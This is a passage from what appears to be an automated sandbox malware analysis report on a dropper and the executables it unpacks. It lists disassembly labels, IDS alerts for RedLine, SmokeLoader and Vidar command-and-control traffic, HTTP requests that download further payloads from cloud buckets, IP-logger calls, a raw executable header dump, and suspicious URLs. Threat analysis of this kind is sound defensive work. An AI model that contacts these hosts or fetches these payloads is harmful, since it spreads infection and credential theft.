00000016.00000003.435223737.0000000005FBB000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.436121107.0000000005E60000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.433193147.0000000005E63000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.432385043.0000000005F87000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.426632292.0000000005822000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\ratiji\kizakekajaco-vo.pdb source: T4IoJqcAwY.exe, 00000000.00000003.253868476.000000000424C000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: /C:\ratiji\kizakekajaco-vo.pdb source: T4IoJqcAwY.exe, 00000000.00000003.253868476.000000000424C000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeCode function: 0_2_00404B47 FindFirstFileW,0_2_00404B47
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829251169ea_9dc91d.exeCode function: 14_2_00418C57 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,14_2_00418C57
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exeCode function: 16_2_0040AEF4 FindFirstFileW,FindClose,16_2_0040AEF4
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\62829252dc457_91e450cbce.exeCode function: 16_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,16_2_0040A928
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then sub esp, 1Ch5_2_0041CE40
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then push ebp5_2_004200D0
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then sub esp, 1Ch5_2_00404200
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then mov eax, dword ptr [ecx]5_2_0042A430
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_0040E630
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_0040E6C0
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_00498680
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_0040E751
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then sub esp, 1Ch5_2_00404765
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then sub esp, 1Ch5_2_0040472E
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then sub esp, 1Ch5_2_004047D3
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then sub esp, 1Ch5_2_0040479C
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_0040E7A9
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_0040E869
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then sub esp, 1Ch5_2_00404869
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_0040E830
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_0040E8D0
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then sub esp, 1Ch5_2_004048FE
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_0040E893
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_0040E8AC
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_0040E960
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then sub esp, 1Ch5_2_0040496C
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then sub esp, 1Ch5_2_00404935
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_0040E9E0
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then mov eax, dword ptr [ecx]5_2_00420980
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_0040EA65
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then sub edx, 01h5_2_0041CA70
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_0040EA30
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_0040EA90
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then sub esp, 1Ch5_2_0041CA90
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then sub esp, 1Ch5_2_0041CB04
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then sub esp, 1Ch5_2_0041CC52
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_0040EC60
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then sub edx, 01h5_2_0041CA70
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then sub esp, 1Ch5_2_0041CD00
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_0040ED09
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_0040EECC
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_00410EEC
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then push edi5_2_00420EF0
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_0040EF40
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_00410F30
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_0040F0F0
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_0040F080
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_0040F2F0
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then push edi5_2_004612B0
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then push ebx5_2_004612B0
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_0040F470
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_0040F4C9
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_0040D5E0
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then mov eax, ecx5_2_00483630
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then push edi5_2_00429740
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_0040D760
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_0040F8E0
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_0040F980
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then jmp 004014E0h5_2_0040FD00
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\setup_install.exeCode function: 4x nop then push ebp5_2_00445E80

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2839343 ETPRO MALWARE InnoDownloadPlugin User-Agent Observed 192.168.2.4:49765 -> 151.115.10.1:80
                    Source: TrafficSnort IDS: 2839343 ETPRO MALWARE InnoDownloadPlugin User-Agent Observed 192.168.2.4:49776 -> 34.88.62.135:80
                    Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.4:53989 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2850027 ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.4:49792 -> 185.215.113.70:12189
                    Source: TrafficSnort IDS: 2850286 ETPRO TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49792 -> 185.215.113.70:12189
                    Source: TrafficSnort IDS: 2850353 ETPRO MALWARE Redline Stealer TCP CnC - Id1Response 185.215.113.70:12189 -> 192.168.2.4:49792
                    Source: TrafficSnort IDS: 2850316 ETPRO MALWARE Observed SmokeLoader CnC Activity 192.168.2.4:49810 -> 41.41.255.235:80
                    Source: TrafficSnort IDS: 2850316 ETPRO MALWARE Observed SmokeLoader CnC Activity 192.168.2.4:49820 -> 91.189.114.27:80
                    Source: TrafficSnort IDS: 2016778 ET DNS Query to a *.pw domain - Likely Hostile 192.168.2.4:50661 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2027758 ET DNS Query for .cc TLD 192.168.2.4:59510 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.4:49320 -> 8.8.8.8:53
                    Source: TrafficSnort IDS: 2850027 ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.4:49830 -> 194.36.177.106:13511
                    Source: TrafficSnort IDS: 2850286 ETPRO TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49830 -> 194.36.177.106:13511
                    Source: TrafficSnort IDS: 2850353 ETPRO MALWARE Redline Stealer TCP CnC - Id1Response 194.36.177.106:13511 -> 192.168.2.4:49830
                    Source: TrafficSnort IDS: 2850027 ETPRO TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.4:49835 -> 194.36.177.106:13511
                    Source: TrafficSnort IDS: 2850286 ETPRO TROJAN Redline Stealer TCP CnC Activity 192.168.2.4:49835 -> 194.36.177.106:13511
                    Source: TrafficSnort IDS: 2850353 ETPRO MALWARE Redline Stealer TCP CnC - Id1Response 194.36.177.106:13511 -> 192.168.2.4:49835
                    Source: TrafficSnort IDS: 2850316 ETPRO MALWARE Observed SmokeLoader CnC Activity 192.168.2.4:49836 -> 193.109.246.62:80
                    Source: TrafficSnort IDS: 2035911 ET TROJAN Vidar/Arkei/Megumin Stealer Keywords Retrieved 116.202.0.187:80 -> 192.168.2.4:49877
                    Source: TrafficSnort IDS: 2834928 ETPRO MALWARE Observed Suspicious UA (AdvancedInstaller) 192.168.2.4:49889 -> 206.81.21.194:80
                    Yara detected onlyLogger
                    Source: Yara matchFile source: 0000001F.00000002.351468140.0000000000400000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000002.354655096.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001F.00000003.328543669.00000000047D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    May check the online IP address of the machine
                    Source: C:\Users\user\AppData\Local\Temp\7zSCE13AF7E\6282925ab52f1_fdd12e5.exeDNS query: name: ip-api.com
                    Creates HTML files with .exe extension (expired dropper behavior)
                    Source: C:\Users\user\Desktop\T4IoJqcAwY.exeFile created: 628292505a6c3_91a0215e.exe.0.dr
                    Source: global trafficHTTP traffic detected: POST /Series/SuperNitouDisc.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: connectini.netContent-Length: 51Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /ultimate/publish-gcdexh7kcw9xhrx4.exe HTTP/1.1Host: yuuichirou-hanma.s3.pl-waw.scw.cloudConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /ultimate/up-to-qqpuv99897uygdj2.exe HTTP/1.1Host: yuuichirou-hanma.s3.pl-waw.scw.cloud
                    Source: global trafficHTTP traffic detected: POST /Series/Conumer4Publisher.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: connectini.netCache-Control: no-store,no-cachePragma: no-cacheContent-Length: 53Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /Series/publisher/1/CH.json HTTP/1.1Host: connectini.netCache-Control: no-store,no-cachePragma: no-cache
                    Source: global trafficHTTP traffic detected: GET /ultimate/hand-uqc3q25p48egzty7.exe HTTP/1.1Host: yuuichirou-hanma.s3.pl-waw.scw.cloud
                    Source: global trafficHTTP traffic detected: POST /Series/Conumer2kenpachi.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: connectini.netContent-Length: 53Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /Series/kenpachi/2/goodchannel/CH.json HTTP/1.1Host: connectini.net
                    Source: global trafficHTTP traffic detected: GET /widgets/powerOff.exe HTTP/1.1Host: doja-cat.s3.pl-waw.scw.cloudConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /Series/configPoduct/2/goodchannel.json HTTP/1.1Host: connectini.net
                    Source: global trafficHTTP traffic detected: GET /ip/check.php?duplicate=kenpachi2_non-search_goodchannel_installrox2_EbookReader HTTP/1.1Host: connectini.net
                    Source: global trafficHTTP traffic detected: GET /1Nayx7 HTTP/1.1Host: iplogger.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_AdxpertMedia_IbottaIOS HTTP/1.1Host: connectini.net
                    Source: global trafficHTTP traffic detected: GET /S2S/Disc/Disc.php?ezok=pwoffch2&tesla=7 HTTP/1.1Host: connectini.net
                    Source: global trafficHTTP traffic detected: GET /1Rqjs7 HTTP/1.1Host: iplogger.org
                    Source: global trafficHTTP traffic detected: GET /1B6Bb7 HTTP/1.1Host: iplogger.org
                    Source: global trafficHTTP traffic detected: GET /1Xxky7 HTTP/1.1Host: iplogger.org
                    Source: global trafficHTTP traffic detected: GET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_handselfdiyWW HTTP/1.1Host: connectini.net
                    Source: global trafficHTTP traffic detected: GET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_TrueVpnWW HTTP/1.1Host: connectini.net
                    Source: global trafficHTTP traffic detected: GET /ip/check.php?duplicate=kenpachi2_registry_goodchannel_lylal_HamperWW HTTP/1.1Host: connectini.net
                    Source: global trafficHTTP traffic detected: GET /2DiK57 HTTP/1.1Host: iplogger.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Series/za3ma_za3ma.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: connectini.netContent-Length: 164Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /Series/scofild1.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: connectini.netContent-Length: 97Expect: 100-continue
                    Source: global trafficHTTP traffic detected: GET /1L7Vh7 HTTP/1.1Host: iplogger.org
                    Source: global trafficHTTP traffic detected: GET /2AqfG6 HTTP/1.1Host: iplogger.orgCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GETData Raw: Data Ascii:
                    Source: global trafficHTTP traffic detected: GETData Raw: Data Ascii:
                    Source: global trafficHTTP traffic detected: GETData Raw: Data Ascii:
                    Source: global trafficHTTP traffic detected: GETData Raw: Data Ascii:
                    Source: global trafficHTTP traffic detected: GETData Raw: Data Ascii:
                    Source: global trafficHTTP traffic detected: GETData Raw: Data Ascii:
                    Source: global trafficHTTP traffic detected: GETData Raw: Data Ascii:
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKContent-Length: 377856x-amz-id-2: tx23f6551a6e14474e93a84-0062889539Accept-Ranges: bytesLast-Modified: Mon, 09 May 2022 13:59:42 GMTETag: "05ccfcafe888dd83e0969080e8897aec"x-amz-request-id: tx23f6551a6e14474e93a84-0062889539x-amz-version-id: 1652104782007633Content-Type: application/octet-streamDate: Sat, 21 May 2022 07:31:05 GMTData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 36 c6 fc f2 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 06 00 00 74 05 00 00 4c 00 00 00 00 00 00 de 92 05 00 00 20 00 00 00 a0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 06 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 90 92 05 00 4b 00 00 00 00 c0 05 00 ec 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 06 00 0c 00 00 00 4a 92 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 72 05 00 00 20 00 00 00 74 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 f8 02 00 00 00 a0 05 00 00 04 00 00 00 78 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ec 45 00 00 00 c0 05 00 00 46 00 00 00 7c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 06 00 00 02 00 00 00 c2 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: GET /23.html HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: v.xyzgamev.com
                    Source: global trafficHTTP traffic detected: GET /login.html HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: v.xyzgamev.com
                    Source: global trafficHTTP traffic detected: GET /25.html HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: v.xyzgamev.com
                    Source: global trafficHTTP traffic detected: GET /1tEnk7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36Host: iplogger.orgCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /nunchucks/rec-fnpj3agqpa83jpen.exe HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36;Host: doja-cat.s3.pl-waw.scw.cloudConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /login.html HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: v.xyzgamev.com
                    Source: global trafficHTTP traffic detected: GET /1RaBg7 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/515.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36Host: iplogger.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /1Pz8p7 HTTP/1.1User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.1 Mobile/15E148 Safari/604.1Host: iplogger.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /json/ HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.67 Safari/537.36Host: ip-api.com
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.651273856.0000000002576000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.155.207.188/win.pac
                    Source: 62829258f111c_8df26f0c7d.exe, 00000016.00000003.429461424.0000000005A59000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://203.159.80.49/library.php
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.654823744.000000000260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.654823744.000000000260C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
                    Source: 6282925ab52f1_fdd12e5.exe, 00000018.00000000.365799796.0000000000578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/
                    Source: 6282925ab52f1_fdd12e5.exe, 00000018.00000000.365799796.0000000000578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/
                    Source: 6282925ab52f1_fdd12e5.exe, 00000018.00000000.365799796.0000000000578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/B
                    Source: 6282925ab52f1_fdd12e5.exe, 00000018.00000000.365799796.0000000000578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/s
                    Source: 6282925ab52f1_fdd12e5.exe, 00000018.00000000.365799796.0000000000578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/sJ
                    Source: 6282925ab52f1_fdd12e5.exe, 00000018.00000000.365799796.0000000000578000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json/~
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.651853256.00000000025C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://iplogger.org
                    Source: T4IoJqcAwY.exe, 00000000.00000003.254237079.0000000004307000.00000004.00001000.00020000.00000000.sdmp, setup_install.exe, 00000005.00000002.287268352.0000000064957000.00000008.00000001.01000000.00000005.sdmpString found in binary or memory: http://mingw-w64.sourceforge.net/X
                    Source: T4IoJqcAwY.exe, 00000000.00000003.252388153.00000000039A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://nhsgeehf.xyz/?ts=fFJlZ25pdHp8fDMyYjU1fGJ1Y2tldDA2M3x8fHx8fDYyODI5MjUwMzM2MzR8fHwxNjUyNzI0MzA0
                    Source: T4IoJqcAwY.exe, 00000000.00000003.252388153.00000000039A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://parkingcrew.net/assets
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.651450658.000000000258A000.00000004.00000800.00020000.00000000.sdmp, 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.651273856.0000000002576000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://run-van-dan.xyz
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.649500041.0000000002451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://run-van-dan.xyz/
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.651329884.0000000002584000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://run-van-dan.xyzx
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.649500041.0000000002451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: 62829252dc457_91e450cbce.exe, 00000010.00000003.398723114.000000000225B000.00000004.00001000.00020000.00000000.sdmp, 62829252dc457_91e450cbce.exe, 00000010.00000003.274743636.00000000024C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://timenames.com/77_1.exe
                    Source: 62829258f111c_8df26f0c7d.exe, 00000016.00000003.605107164.000000000599C000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.644989284.0000000005A61000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.647795129.00000000057ED000.00000004.00000800.00020000.00000000.sdmp, 62829258f111c_8df26f0c7d.exe, 00000016.00000003.647716380.0000000005822000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ccleaner.comYhttps://maxcazino.net/?faff=1449&sub=Cleaner
                    Source: 62829252dc457_91e450cbce.exe, 00000010.00000003.397602053.00000000021AD000.00000004.00001000.00020000.00000000.sdmp, 62829252dc457_91e450cbce.exe, 00000010.00000003.274743636.00000000024C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.dk-soft.org/
                    Source: 62829252dc457_91e450cbce.exe, 00000010.00000003.397602053.00000000021AD000.00000004.00001000.00020000.00000000.sdmp, 62829252dc457_91e450cbce.exe, 00000010.00000003.274743636.00000000024C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.haysoft.org%1-k
                    Source: T4IoJqcAwY.exe, 00000000.00000003.253975148.00000000042A7000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
                    Source: T4IoJqcAwY.exe, 00000000.00000003.253975148.00000000042A7000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                    Source: 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.654823744.000000000260C000.00000004.00000800.00020000.00000000.sdmp, 6282924fea1c3_82ebfc59.exe, 0000000B.00000002.653019762.00000000025F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
